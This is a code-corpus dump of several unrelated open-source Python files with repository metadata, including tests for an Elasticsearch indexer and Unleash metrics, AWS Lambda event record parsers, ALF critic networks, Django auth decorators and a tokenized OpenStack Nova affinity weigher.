set(annotation["category"]["taxo_names"])
== expected_names[category_id]["taxo_names"]
)
def test_growth_range():
indexer = ElasticSearchIndexer(
weedcoco_path=BASIC_INPUT_PATH, thumbnail_dir=THUMBNAIL_DIR
)
for entry in indexer.generate_index_entries():
growth_range = entry["agcontext"]["bbch_growth_range"]
assert growth_range == {"min": 10, "max": 20}
growth_stage_texts = entry["agcontext"]["growth_stage_texts"]
assert len(growth_stage_texts) == 2
assert entry["agcontext"]["growth_stage_min_text"] in growth_stage_texts
assert entry["agcontext"]["growth_stage_max_text"] in growth_stage_texts
assert (
entry["agcontext"]["growth_stage_max_text"]
!= entry["agcontext"]["growth_stage_min_text"]
)
# TODO: test remove_other_versions
| 31.636364 | 88 | 0.620051 |
165919830f020d83e9ad652431ad1033d8356db4 | 2,487 | py | Python | lambdAWS/record.py | wesky93/lambdAWS | 6ffa45f09284d07c02a2ce47a0665efa2c6b051a | [
"MIT"
] | null | null | null | lambdAWS/record.py | wesky93/lambdAWS | 6ffa45f09284d07c02a2ce47a0665efa2c6b051a | [
"MIT"
] | null | null | null | lambdAWS/record.py | wesky93/lambdAWS | 6ffa45f09284d07c02a2ce47a0665efa2c6b051a | [
"MIT"
] | null | null | null | from boto3.dynamodb.types import TypeDeserializer
class Record :
def __init__( self, raw_record ) :
self.raw = raw_record
self.resource = self.raw[ 'eventSource' ][ 4 : ]
self.region = self.raw[ 'awsRegion' ]
self.eventID = self.raw[ 'eventID' ]
try :
self.eventName = self.raw[ 'eventName' ]
except KeyError :
pass
self.get_item()
def get_item( self ) :
"""
이 메소드를 오버라이드하여 각 리소스에 맞는 정보를 추출한다
:return:
"""
pass
# DynamoDB Stream Event
class DDBStream( Record ) :
"""
DynamoDB Stream Event를 통해 들어온 정보를 파이썬으로 직졀화합니다.
Stream Event중 KEYS_ONLY,OLD_IMAGE,NewImage 이 3가지는 필드명으로 메소드 접근이 가능하다.
ex) abc라는 필드 명이 있을 경우 DDBStream().abc 로 필드 값을 확인 가능함
다만 NEW_AND_OLD_IMAGES일 경우 이전 값과 새로운 값을 모두 받아 들이기에
이전값을 self._old에 딕셔너리 형태로 저장함
"""
def get_item( self ) :
def deserialize( value ) :
"""
boto3.dynamodb.types.TypeDeserializer을 이용하여 각 속성 값을 직렬화
:param value: ddb field dict, ex) {"S":"foobar"}
:return:
"""
return TypeDeserializer().deserialize( value )
def get_attribute( dic: dict ) :
"""
dict형식의 값을 파이썬 딕셔너리로 직렬화
:param dic:
:return:
"""
attr = dic
item = { }
for key, value in attr.items() :
item[ 'key' ] = deserialize( value )
return item
raw = self.raw[ 'dynamodb' ]
# 키값 직렬화
keys = get_attribute( raw[ 'Keys' ] )
self.__dict__.update( keys )
# 스트림 종류에 따른 호출값 분기
streamType = raw[ 'StreamViewType' ]
if streamType == 'KEYS_ONLY' :
pass
elif streamType == 'NEW_IMAGE' :
new = get_attribute( raw[ 'NewImage' ] )
self.__dict__.update( new )
elif streamType == 'OLD_IMAGE' :
old = get_attribute( raw[ 'OldImage' ] )
self.__dict__.update( old )
elif streamType == 'NEW_AND_OLD_IMAGES' :
new = get_attribute( raw[ 'NewImage' ] )
old = get_attribute( raw[ 'OldImage' ] )
self.__dict__.update( new )
self.__dict__.update( { '_old' : old } )
else :
raise KeyError
# S3 Event
class S3( Record ) :
pass
# Sns Event
class Sns( Record ) :
pass
# S3 -> Sns Event
class S3Sns( Record ) :
pass
| 26.178947 | 73 | 0.527543 |
74e12a3e592fa92d61391f88fc3f0a4f24806610 | 2,661 | py | Python | applications/SwimmingDEMApplication/python_scripts/L2_error_calculator_utility.py | clazaro/Kratos | b947b82c90dfcbf13d60511427f85990d36b90be | [
"BSD-4-Clause"
] | 778 | 2017-01-27T16:29:17.000Z | 2022-03-30T03:01:51.000Z | applications/SwimmingDEMApplication/python_scripts/L2_error_calculator_utility.py | clazaro/Kratos | b947b82c90dfcbf13d60511427f85990d36b90be | [
"BSD-4-Clause"
] | 6,634 | 2017-01-15T22:56:13.000Z | 2022-03-31T15:03:36.000Z | applications/SwimmingDEMApplication/python_scripts/L2_error_calculator_utility.py | clazaro/Kratos | b947b82c90dfcbf13d60511427f85990d36b90be | [
"BSD-4-Clause"
] | 224 | 2017-02-07T14:12:49.000Z | 2022-03-06T23:09:34.000Z | from __future__ import print_function, absolute_import, division # makes KratosMultiphysics backward compatible with python 2.6 and 2.7
# importing the Kratos Library
import KratosMultiphysics
from KratosMultiphysics import Vector
import KratosMultiphysics.SwimmingDEMApplication as SDEM
import sys
class L2ErrorCalculatorUtility:
def __init__(self, model, parameters):
"""The default constructor of the class.
Keyword arguments:
self -- It signifies an instance of a class.
model -- the container of the different model parts.
"""
self.model_part = model
self.u_characteristic = parameters["fluid_parameters"]["processes"]["initial_conditions_process_list"][0]["Parameters"]["benchmark_parameters"]["u_char"].GetDouble()
for element in self.model_part.Elements:
rho = element.Properties.GetValue(KratosMultiphysics.DENSITY)
break
self.p_characteristic = (1/2)*rho*self.u_characteristic**2
self.model = KratosMultiphysics.Model()
self.element_name = "Element3D4N"
self.error_model_part = self.model.CreateModelPart("ErrorModelPart")
self.error_model_part.AddNodalSolutionStepVariable(SDEM.VECTORIAL_ERROR)
self.error_model_part.AddNodalSolutionStepVariable(SDEM.SCALAR_ERROR)
self.error_model_part.AddNodalSolutionStepVariable(SDEM.ERROR_X)
self.error_model_part.AddNodalSolutionStepVariable(SDEM.ERROR_Y)
self.error_model_part.AddNodalSolutionStepVariable(SDEM.ERROR_Z)
self.error_model_part.AddNodalSolutionStepVariable(SDEM.ERROR_P)
model_part_cloner = KratosMultiphysics.ConnectivityPreserveModeler()
model_part_cloner.GenerateModelPart(self.model_part, self.error_model_part, self.element_name)
self.error_model_part.ProcessInfo = self.model_part.ProcessInfo
def CalculateL2(self):
self.ComputeDofsErrors(self.error_model_part)
self.velocity_error_norm = self.VectorL2ErrorNorm(self.error_model_part)
self.pressure_error_norm = self.ScalarL2ErrorNorm(self.error_model_part)
return self.velocity_error_norm/self.u_characteristic, self.pressure_error_norm/self.p_characteristic, self.error_model_part
def ComputeDofsErrors(self, error_model_part):
SDEM.L2ErrorNormCalculator().ComputeDofsErrors(self.error_model_part)
def VectorL2ErrorNorm(self, error_model_part):
return SDEM.L2ErrorNormCalculator().GetL2VectorErrorNorm(self.error_model_part)
def ScalarL2ErrorNorm(self, error_model_part):
return SDEM.L2ErrorNormCalculator().GetL2ScalarErrorNorm(self.error_model_part)
| 44.35 | 173 | 0.765502 |
effee3954185be2bc93f6a770225811ef82f0091 | 227 | py | Python | src/python/Sailing/src/sailing/core/sailor.py | emop/task-worker | c97cd432d46c73e3e0908d55e7cd10de0afc0854 | [
"BSD-2-Clause"
] | 1 | 2021-09-01T09:54:38.000Z | 2021-09-01T09:54:38.000Z | src/python/Sailing/src/sailing/core/sailor.py | emop/task-worker | c97cd432d46c73e3e0908d55e7cd10de0afc0854 | [
"BSD-2-Clause"
] | null | null | null | src/python/Sailing/src/sailing/core/sailor.py | emop/task-worker | c97cd432d46c73e3e0908d55e7cd10de0afc0854 | [
"BSD-2-Clause"
] | 1 | 2015-09-19T05:25:31.000Z | 2015-09-19T05:25:31.000Z |
class Sailor(object):
def ready(self):
pass
def idle(self):
pass
def start(self, task):
pass
def waiting(self):
pass
def shutdown(self):
pass | 13.352941 | 26 | 0.462555 |
49f08b393d07917b325ed43a2090356fef9e896d | 1,619 | py | Python | tests/unit_tests/periodic/test_aggregate_and_send_metrics.py | briandcho/unleash-client-python | ce7f69028265fd7aae774aa41144b4f5e078c91d | [
"MIT"
] | null | null | null | tests/unit_tests/periodic/test_aggregate_and_send_metrics.py | briandcho/unleash-client-python | ce7f69028265fd7aae774aa41144b4f5e078c91d | [
"MIT"
] | null | null | null | tests/unit_tests/periodic/test_aggregate_and_send_metrics.py | briandcho/unleash-client-python | ce7f69028265fd7aae774aa41144b4f5e078c91d | [
"MIT"
] | null | null | null | import json
from datetime import datetime, timezone, timedelta
import responses
from fcache.cache import FileCache
from tests.utilities.testing_constants import URL, APP_NAME, INSTANCE_ID, CUSTOM_HEADERS, IP_LIST
from UnleashClient.constants import METRICS_URL, METRIC_LAST_SENT_TIME
from UnleashClient.periodic_tasks import aggregate_and_send_metrics
from UnleashClient.features import Feature
from UnleashClient.strategies import RemoteAddress, Default
FULL_METRICS_URL = URL + METRICS_URL
print(FULL_METRICS_URL)
@responses.activate
def test_aggregate_and_send_metrics():
responses.add(responses.POST, FULL_METRICS_URL, json={}, status=200)
start_time = datetime.now(timezone.utc) - timedelta(seconds=60)
cache = FileCache("TestCache")
cache[METRIC_LAST_SENT_TIME] = start_time
strategies = [RemoteAddress(parameters={"IPs": IP_LIST}), Default()]
my_feature1 = Feature("My Feature1", True, strategies)
my_feature1.yes_count = 1
my_feature1.no_count = 1
my_feature2 = Feature("My Feature2", True, strategies)
my_feature2.yes_count = 2
my_feature2.no_count = 2
features = {"My Feature1": my_feature1, "My Feature 2": my_feature2}
aggregate_and_send_metrics(URL, APP_NAME, INSTANCE_ID, CUSTOM_HEADERS, features, cache)
assert len(responses.calls) == 1
request = json.loads(responses.calls[0].request.body)
assert len(request['bucket']["toggles"].keys()) == 2
assert request['bucket']["toggles"]["My Feature1"]["yes"] == 1
assert request['bucket']["toggles"]["My Feature1"]["no"] == 1
assert cache[METRIC_LAST_SENT_TIME] > start_time
| 37.651163 | 97 | 0.757875 |
72a910cc223e73a2840a87860bc942dd1ca5c0e4 | 14,681 | py | Python | alf/networks/critic_networks.py | breakds/alf | b3d60048daee2c9625ba44f778e49570d0d029a7 | [
"Apache-2.0"
] | 1 | 2021-11-17T17:08:04.000Z | 2021-11-17T17:08:04.000Z | alf/networks/critic_networks.py | ipsec/alf | 15fd71896eac5ad0987dbe14a9f630b32e0e131f | [
"Apache-2.0"
] | null | null | null | alf/networks/critic_networks.py | ipsec/alf | 15fd71896eac5ad0987dbe14a9f630b32e0e131f | [
"Apache-2.0"
] | null | null | null | # Copyright (c) 2020 Horizon Robotics and ALF Contributors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""CriticNetworks"""
import functools
import math
import torch
import alf
import alf.utils.math_ops as math_ops
import alf.nest as nest
from alf.initializers import variance_scaling_init
from alf.tensor_specs import TensorSpec
from .encoding_networks import EncodingNetwork, LSTMEncodingNetwork, ParallelEncodingNetwork
def _check_action_specs_for_critic_networks(
action_spec, action_input_processors, action_preprocessing_combiner):
if len(nest.flatten(action_spec)) > 1:
assert action_preprocessing_combiner is not None, (
"An action combiner is needed when there are multiple action specs:"
" {}".format(action_spec))
def _check_individual(spec, proc):
if spec.is_discrete:
assert proc is not None, (
'CriticNetwork only supports continuous actions. One of given '
+ 'action specs {} is discrete. Use QNetwork instead. '.format(
spec) +
'Alternatively, specify `action_input_processors` to transform '
+ 'discrete actions to continuous action embeddings first.')
if action_input_processors is None:
action_input_processors = nest.map_structure(lambda _: None,
action_spec)
nest.map_structure(_check_individual, action_spec, action_input_processors)
@alf.configurable
class CriticNetwork(EncodingNetwork):
"""Creates an instance of ``CriticNetwork`` for estimating action-value of
continuous or discrete actions. The action-value is defined as the expected
return starting from the given input observation and taking the given action.
This module takes observation as input and action as input and outputs an
action-value tensor with the shape of ``[batch_size]``.
The network take a tuple of (observation, action) as input to computes the
action-value given an observation.
"""
def __init__(self,
input_tensor_spec,
output_tensor_spec=TensorSpec(()),
observation_input_processors=None,
observation_preprocessing_combiner=None,
observation_conv_layer_params=None,
observation_fc_layer_params=None,
action_input_processors=None,
action_preprocessing_combiner=None,
action_fc_layer_params=None,
observation_action_combiner=None,
joint_fc_layer_params=None,
activation=torch.relu_,
kernel_initializer=None,
use_fc_bn=False,
use_naive_parallel_network=False,
name="CriticNetwork"):
"""
Args:
input_tensor_spec: A tuple of ``TensorSpec``s ``(observation_spec, action_spec)``
representing the inputs.
output_tensor_spec (TensorSpec): spec for the output
observation_input_preprocessors (nested Network|nn.Module|None): a nest of
input preprocessors, each of which will be applied to the
corresponding observation input.
observation_preprocessing_combiner (NestCombiner): preprocessing called
on complex observation inputs.
observation_conv_layer_params (tuple[tuple]): a tuple of tuples where each
tuple takes a format ``(filters, kernel_size, strides, padding)``,
where ``padding`` is optional.
observation_fc_layer_params (tuple[int]): a tuple of integers representing
hidden FC layer sizes for observations.
action_input_processors (nested Network|nn.Module|None): a nest of
input preprocessors, each of which will be applied to the
corresponding action input.
action_preprocessing_combiner (NestCombiner): preprocessing called
to combine complex action inputs.
action_fc_layer_params (tuple[int]): a tuple of integers representing
hidden FC layer sizes for actions.
observation_action_combiner (NestCombiner): combiner class for fusing
the observation and action. If None, ``NestConcat`` will be used.
joint_fc_layer_params (tuple[int]): a tuple of integers representing
hidden FC layer sizes FC layers after merging observations and
actions.
activation (nn.functional): activation used for hidden layers. The
last layer will not be activated.
kernel_initializer (Callable): initializer for all the layers but
the last layer. If none is provided a variance_scaling_initializer
with uniform distribution will be used.
use_fc_bn (bool): whether use Batch Normalization for the internal
FC layers (i.e. FC layers beside the last one).
use_naive_parallel_network (bool): if True, will use
``NaiveParallelNetwork`` when ``make_parallel`` is called. This
might be useful in cases when the ``NaiveParallelNetwork``
has an advantange in terms of speed over ``ParallelNetwork``.
You have to test to see which way is faster for your particular
situation.
name (str):
"""
if kernel_initializer is None:
kernel_initializer = functools.partial(
variance_scaling_init,
gain=math.sqrt(1.0 / 3),
mode='fan_in',
distribution='uniform')
observation_spec, action_spec = input_tensor_spec
obs_encoder = EncodingNetwork(
observation_spec,
input_preprocessors=observation_input_processors,
preprocessing_combiner=observation_preprocessing_combiner,
conv_layer_params=observation_conv_layer_params,
fc_layer_params=observation_fc_layer_params,
activation=activation,
kernel_initializer=kernel_initializer,
use_fc_bn=use_fc_bn,
name=name + ".obs_encoder")
_check_action_specs_for_critic_networks(action_spec,
action_input_processors,
action_preprocessing_combiner)
action_encoder = EncodingNetwork(
action_spec,
input_preprocessors=action_input_processors,
preprocessing_combiner=action_preprocessing_combiner,
fc_layer_params=action_fc_layer_params,
activation=activation,
kernel_initializer=kernel_initializer,
use_fc_bn=use_fc_bn,
name=name + ".action_encoder")
last_kernel_initializer = functools.partial(
torch.nn.init.uniform_, a=-0.003, b=0.003)
if observation_action_combiner is None:
observation_action_combiner = alf.layers.NestConcat(dim=-1)
super().__init__(
input_tensor_spec=input_tensor_spec,
output_tensor_spec=output_tensor_spec,
input_preprocessors=(obs_encoder, action_encoder),
preprocessing_combiner=observation_action_combiner,
fc_layer_params=joint_fc_layer_params,
activation=activation,
kernel_initializer=kernel_initializer,
last_layer_size=output_tensor_spec.numel,
last_activation=math_ops.identity,
use_fc_bn=use_fc_bn,
last_kernel_initializer=last_kernel_initializer,
name=name)
self._use_naive_parallel_network = use_naive_parallel_network
def make_parallel(self, n):
"""Create a parallel critic network using ``n`` replicas of ``self``.
The initialized network parameters will be different.
If ``use_naive_parallel_network`` is True, use ``NaiveParallelNetwork``
to create the parallel network.
"""
if self._use_naive_parallel_network:
return alf.networks.NaiveParallelNetwork(self, n)
else:
return super().make_parallel(n, True)
@alf.configurable
class CriticRNNNetwork(LSTMEncodingNetwork):
"""Creates an instance of ``CriticRNNNetwork`` for estimating action-value
of continuous or discrete actions. The action-value is defined as the
expected return starting from the given inputs (observation and state) and
taking the given action. It takes observation and state as input and outputs
an action-value tensor with the shape of [batch_size].
"""
def __init__(self,
input_tensor_spec,
output_tensor_spec=TensorSpec(()),
observation_input_processors=None,
observation_preprocessing_combiner=None,
observation_conv_layer_params=None,
observation_fc_layer_params=None,
action_input_processors=None,
action_preprocessing_combiner=None,
action_fc_layer_params=None,
joint_fc_layer_params=None,
lstm_hidden_size=100,
critic_fc_layer_params=None,
activation=torch.relu_,
kernel_initializer=None,
name="CriticRNNNetwork"):
"""
Args:
input_tensor_spec: A tuple of ``TensorSpec``s ``(observation_spec, action_spec)``
representing the inputs.
ourput_tensor_spec (TensorSpec): spec for the output
observation_input_preprocessors (nested Network|nn.Module|None): a nest of
input preprocessors, each of which will be applied to the
corresponding observation input.
observation_preprocessing_combiner (NestCombiner): preprocessing called
on complex observation inputs.
observation_conv_layer_params (tuple[tuple]): a tuple of tuples where each
tuple takes a format ``(filters, kernel_size, strides, padding)``,
where ``padding`` is optional.
observation_fc_layer_params (tuple[int]): a tuple of integers representing
hidden FC layer sizes for observations.
action_input_processors (nested Network|nn.Module|None): a nest of
input preprocessors, each of which will be applied to the
corresponding action input.a
action_preprocessing_combiner (NestCombiner): preprocessing called
to combine complex action inputs.
action_fc_layer_params (tuple[int]): a tuple of integers representing
hidden FC layer sizes for actions.
joint_fc_layer_params (tuple[int]): a tuple of integers representing
hidden FC layer sizes FC layers after merging observations and
actions.
lstm_hidden_size (int or tuple[int]): the hidden size(s)
of the LSTM cell(s). Each size corresponds to a cell. If there
are multiple sizes, then lstm cells are stacked.
critic_fc_layer_params (tuple[int]): a tuple of integers representing
hidden FC layers that are applied after the lstm cell's output.
activation (nn.functional): activation used for hidden layers. The
last layer will not be activated.
kernel_initializer (Callable): initializer for all the layers but
the last layer. If none is provided a ``variance_scaling_initializer``
with uniform distribution will be used.
name (str):
"""
if kernel_initializer is None:
kernel_initializer = functools.partial(
variance_scaling_init,
gain=math.sqrt(1.0 / 3),
mode='fan_in',
distribution='uniform')
observation_spec, action_spec = input_tensor_spec
obs_encoder = EncodingNetwork(
observation_spec,
input_preprocessors=observation_input_processors,
preprocessing_combiner=observation_preprocessing_combiner,
conv_layer_params=observation_conv_layer_params,
fc_layer_params=observation_fc_layer_params,
activation=activation,
kernel_initializer=kernel_initializer)
_check_action_specs_for_critic_networks(action_spec,
action_input_processors,
action_preprocessing_combiner)
action_encoder = EncodingNetwork(
action_spec,
input_preprocessors=action_input_processors,
preprocessing_combiner=action_preprocessing_combiner,
fc_layer_params=action_fc_layer_params,
activation=activation,
kernel_initializer=kernel_initializer)
last_kernel_initializer = functools.partial(
torch.nn.init.uniform_, a=-0.003, b=0.003)
super().__init__(
input_tensor_spec=input_tensor_spec,
output_tensor_spec=output_tensor_spec,
input_preprocessors=(obs_encoder, action_encoder),
preprocessing_combiner=alf.layers.NestConcat(dim=-1),
pre_fc_layer_params=joint_fc_layer_params,
hidden_size=lstm_hidden_size,
post_fc_layer_params=critic_fc_layer_params,
activation=activation,
kernel_initializer=kernel_initializer,
last_layer_size=output_tensor_spec.numel,
last_activation=math_ops.identity,
last_kernel_initializer=last_kernel_initializer)
def make_parallel(self, n):
"""Create a parallel critic RNN network using ``n`` replicas of ``self``.
The initialized network parameters will be different.
If ``use_naive_parallel_network`` is True, use ``NaiveParallelNetwork``
to create the parallel network.
"""
return super().make_parallel(n, True)
| 47.665584 | 93 | 0.649683 |
e728b3a6504e94174778e77912866b7cd8da6690 | 3,759 | py | Python | cinder/volume/drivers/coprhd/helpers/host.py | bswartz/cinder | 6cfecade9e2ee86bbb7d95c3c401c9e4c70f6a96 | [
"Apache-2.0"
] | null | null | null | cinder/volume/drivers/coprhd/helpers/host.py | bswartz/cinder | 6cfecade9e2ee86bbb7d95c3c401c9e4c70f6a96 | [
"Apache-2.0"
] | null | null | null | cinder/volume/drivers/coprhd/helpers/host.py | bswartz/cinder | 6cfecade9e2ee86bbb7d95c3c401c9e4c70f6a96 | [
"Apache-2.0"
] | null | null | null | # Copyright (c) 2016 EMC Corporation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from cinder.i18n import _
from cinder.volume.drivers.coprhd.helpers import commoncoprhdapi as common
from cinder.volume.drivers.coprhd.helpers import tenant
class Host(common.CoprHDResource):
# All URIs for the Host operations
URI_HOST_DETAILS = "/compute/hosts/{0}"
URI_HOST_LIST_INITIATORS = "/compute/hosts/{0}/initiators"
URI_COMPUTE_HOST = "/compute/hosts"
URI_HOSTS_SEARCH_BY_NAME = "/compute/hosts/search?name={0}"
def query_by_name(self, host_name, tenant_name=None):
"""Search host matching host_name and tenant if tenant_name provided.
tenant_name is optional
"""
hostList = self.list_all(tenant_name)
for host in hostList:
hostUri = host['id']
hostDetails = self.show_by_uri(hostUri)
if hostDetails:
if hostDetails['name'] == host_name:
return hostUri
raise common.CoprHdError(common.CoprHdError.NOT_FOUND_ERR, (_(
"Host with name: %s not found") % host_name))
def list_initiators(self, host_name):
"""Lists all initiators for the given host.
:param host_name: The name of the host
"""
if not common.is_uri(host_name):
hostUri = self.query_by_name(host_name, None)
else:
hostUri = host_name
(s, h) = common.service_json_request(
self.ipaddr, self.port, "GET",
Host.URI_HOST_LIST_INITIATORS.format(hostUri),
None)
o = common.json_decode(s)
if not o or "initiator" not in o:
return []
return common.get_node_value(o, 'initiator')
def list_all(self, tenant_name):
"""Gets the ids and self links for all compute elements."""
restapi = self.URI_COMPUTE_HOST
tenant_obj = tenant.Tenant(self.ipaddr, self.port)
if tenant_name is None:
tenant_uri = tenant_obj.tenant_getid()
else:
tenant_uri = tenant_obj.tenant_query(tenant_name)
restapi = restapi + "?tenant=" + tenant_uri
(s, h) = common.service_json_request(
self.ipaddr, self.port,
"GET",
restapi,
None)
o = common.json_decode(s)
return o['host']
def show_by_uri(self, uri):
"""Makes REST API call to retrieve Host details based on its UUID."""
(s, h) = common.service_json_request(self.ipaddr, self.port, "GET",
Host.URI_HOST_DETAILS.format(uri),
None)
o = common.json_decode(s)
inactive = common.get_node_value(o, 'inactive')
if inactive:
return None
return o
def search_by_name(self, host_name):
"""Search host by its name."""
(s, h) = common.service_json_request(
self.ipaddr, self.port, "GET",
self.URI_HOSTS_SEARCH_BY_NAME.format(host_name), None)
o = common.json_decode(s)
if not o:
return []
return common.get_node_value(o, "resource")
| 35.8 | 79 | 0.614525 |
37b907907f050194f31587b8b969113a63c9a5a1 | 3,049 | py | Python | python3.4Smartforest/lib/python3.4/site-packages/django/contrib/auth/decorators.py | letouriste001/SmartForest_2.0 | 109b78bf1e8c8404800f377ab969395ccbb617be | [
"MIT"
] | null | null | null | python3.4Smartforest/lib/python3.4/site-packages/django/contrib/auth/decorators.py | letouriste001/SmartForest_2.0 | 109b78bf1e8c8404800f377ab969395ccbb617be | [
"MIT"
] | null | null | null | python3.4Smartforest/lib/python3.4/site-packages/django/contrib/auth/decorators.py | letouriste001/SmartForest_2.0 | 109b78bf1e8c8404800f377ab969395ccbb617be | [
"MIT"
] | null | null | null | from functools import wraps
from django.conf import settings
from django.contrib.auth import REDIRECT_FIELD_NAME
from django.core.exceptions import PermissionDenied
from django.shortcuts import resolve_url
from django.utils import six
from django.utils.decorators import available_attrs
from django.utils.six.moves.urllib.parse import urlparse
def user_passes_test(test_func, login_url=None, redirect_field_name=REDIRECT_FIELD_NAME):
"""
Decorator for views that checks that the user passes the given test,
redirecting to the log-in page if necessary. The test should be a callable
that takes the user object and returns True if the user passes.
"""
def decorator(view_func):
@wraps(view_func, assigned=available_attrs(view_func))
def _wrapped_view(request, *args, **kwargs):
if test_func(request.user):
return view_func(request, *args, **kwargs)
path = request.build_absolute_uri()
resolved_login_url = resolve_url(login_url or settings.LOGIN_URL)
# If the login url is the same scheme and net location then just
# use the path as the "next" url.
login_scheme, login_netloc = urlparse(resolved_login_url)[:2]
current_scheme, current_netloc = urlparse(path)[:2]
if ((not login_scheme or login_scheme == current_scheme) and
(not login_netloc or login_netloc == current_netloc)):
path = request.get_full_path()
from django.contrib.auth.views import redirect_to_login
return redirect_to_login(
path, resolved_login_url, redirect_field_name)
return _wrapped_view
return decorator
def login_required(function=None, redirect_field_name=REDIRECT_FIELD_NAME, login_url=None):
"""
Decorator for views that checks that the user is logged in, redirecting
to the log-in page if necessary.
"""
actual_decorator = user_passes_test(
lambda u: u.is_authenticated(),
login_url=login_url,
redirect_field_name=redirect_field_name
)
if function:
return actual_decorator(function)
return actual_decorator
def permission_required(perm, login_url=None, raise_exception=False):
"""
Decorator for views that checks whether a user has a particular permission
enabled, redirecting to the log-in page if necessary.
If the raise_exception parameter is given the PermissionDenied exception
is raised.
"""
def check_perms(user):
if isinstance(perm, six.string_types):
perms = (perm, )
else:
perms = perm
# First check if the user has the permission (even anon users)
if user.has_perms(perms):
return True
# In case the 403 handler should be called raise the exception
if raise_exception:
raise PermissionDenied
# As the last resort, show the login form
return False
return user_passes_test(check_perms, login_url=login_url)
| 3,049 | 3,049 | 0.69367 |
526d893526ca89ba0d96a81e9d02698c714cfff2 | 1,170 | py | Python | tests/storage/cases/test_KT1VvXEpeBpreAVpfp4V8ZujqWu2gVykwXBJ_babylon.py | juztin/pytezos-1 | 7e608ff599d934bdcf129e47db43dbdb8fef9027 | [
"MIT"
] | 1 | 2020-08-11T02:31:24.000Z | 2020-08-11T02:31:24.000Z | tests/storage/cases/test_KT1VvXEpeBpreAVpfp4V8ZujqWu2gVykwXBJ_babylon.py | juztin/pytezos-1 | 7e608ff599d934bdcf129e47db43dbdb8fef9027 | [
"MIT"
] | 1 | 2020-12-30T16:44:56.000Z | 2020-12-30T16:44:56.000Z | tests/storage/cases/test_KT1VvXEpeBpreAVpfp4V8ZujqWu2gVykwXBJ_babylon.py | tqtezos/pytezos | a4ac0b022d35d4c9f3062609d8ce09d584b5faa8 | [
"MIT"
] | 1 | 2022-03-20T19:01:00.000Z | 2022-03-20T19:01:00.000Z | from unittest import TestCase
from tests import get_data
from pytezos.michelson.converter import build_schema, decode_micheline, encode_micheline, micheline_to_michelson
class StorageTestKT1VvXEpeBpreAVpfp4V8ZujqWu2gVykwXBJ_babylon(TestCase):
@classmethod
def setUpClass(cls):
cls.maxDiff = None
cls.contract = get_data('storage/mainnet/KT1VvXEpeBpreAVpfp4V8ZujqWu2gVykwXBJ_babylon.json')
def test_storage_encoding_KT1VvXEpeBpreAVpfp4V8ZujqWu2gVykwXBJ_babylon(self):
type_expr = self.contract['script']['code'][1]
val_expr = self.contract['script']['storage']
schema = build_schema(type_expr)
decoded = decode_micheline(val_expr, type_expr, schema)
actual = encode_micheline(decoded, schema)
self.assertEqual(val_expr, actual)
def test_storage_schema_KT1VvXEpeBpreAVpfp4V8ZujqWu2gVykwXBJ_babylon(self):
_ = build_schema(self.contract['script']['code'][0])
def test_storage_format_KT1VvXEpeBpreAVpfp4V8ZujqWu2gVykwXBJ_babylon(self):
_ = micheline_to_michelson(self.contract['script']['code'])
_ = micheline_to_michelson(self.contract['script']['storage'])
| 41.785714 | 112 | 0.757265 |
de4a6e8103e176d0d6d39a6a3f3056286fa6720f | 6,287 | py | Python | nova/scheduler/weights/affinity.py | bopopescu/nova-token | ec98f69dea7b3e2b9013b27fd55a2c1a1ac6bfb2 | [
"Apache-2.0"
] | null | null | null | nova/scheduler/weights/affinity.py | bopopescu/nova-token | ec98f69dea7b3e2b9013b27fd55a2c1a1ac6bfb2 | [
"Apache-2.0"
] | null | null | null | nova/scheduler/weights/affinity.py | bopopescu/nova-token | ec98f69dea7b3e2b9013b27fd55a2c1a1ac6bfb2 | [
"Apache-2.0"
] | 2 | 2017-07-20T17:31:34.000Z | 2020-07-24T02:42:19.000Z | begin_unit
comment|'# Copyright (c) 2015 Ericsson AB'
nl|'\n'
comment|'# All Rights Reserved.'
nl|'\n'
comment|'#'
nl|'\n'
comment|'# Licensed under the Apache License, Version 2.0 (the "License"); you may'
nl|'\n'
comment|'# not use this file except in compliance with the License. You may obtain'
nl|'\n'
comment|'# a copy of the License at'
nl|'\n'
comment|'#'
nl|'\n'
comment|'# http://www.apache.org/licenses/LICENSE-2.0'
nl|'\n'
comment|'#'
nl|'\n'
comment|'# Unless required by applicable law or agreed to in writing, software'
nl|'\n'
comment|'# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT'
nl|'\n'
comment|'# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the'
nl|'\n'
comment|'# License for the specific language governing permissions and limitations'
nl|'\n'
comment|'# under the License.'
nl|'\n'
string|'"""\nAffinity Weighers. Weigh hosts by the number of instances from a given host.\n\nAffinityWeigher implements the soft-affinity policy for server groups by\npreferring the hosts that has more instances from the given group.\n\nAntiAffinityWeigher implements the soft-anti-affinity policy for server groups\nby preferring the hosts that has less instances from the given group.\n\n"""'
newline|'\n'
name|'from'
name|'oslo_config'
name|'import'
name|'cfg'
newline|'\n'
name|'from'
name|'oslo_log'
name|'import'
name|'log'
name|'as'
name|'logging'
newline|'\n'
nl|'\n'
name|'from'
name|'nova'
op|'.'
name|'i18n'
name|'import'
name|'_LW'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'scheduler'
name|'import'
name|'weights'
newline|'\n'
nl|'\n'
DECL|variable|CONF
name|'CONF'
op|'='
name|'cfg'
op|'.'
name|'CONF'
newline|'\n'
nl|'\n'
DECL|variable|LOG
name|'LOG'
op|'='
name|'logging'
op|'.'
name|'getLogger'
op|'('
name|'__name__'
op|')'
newline|'\n'
nl|'\n'
nl|'\n'
DECL|class|_SoftAffinityWeigherBase
name|'class'
name|'_SoftAffinityWeigherBase'
op|'('
name|'weights'
op|'.'
name|'BaseHostWeigher'
op|')'
op|':'
newline|'\n'
DECL|variable|policy_name
indent|' '
name|'policy_name'
op|'='
name|'None'
newline|'\n'
nl|'\n'
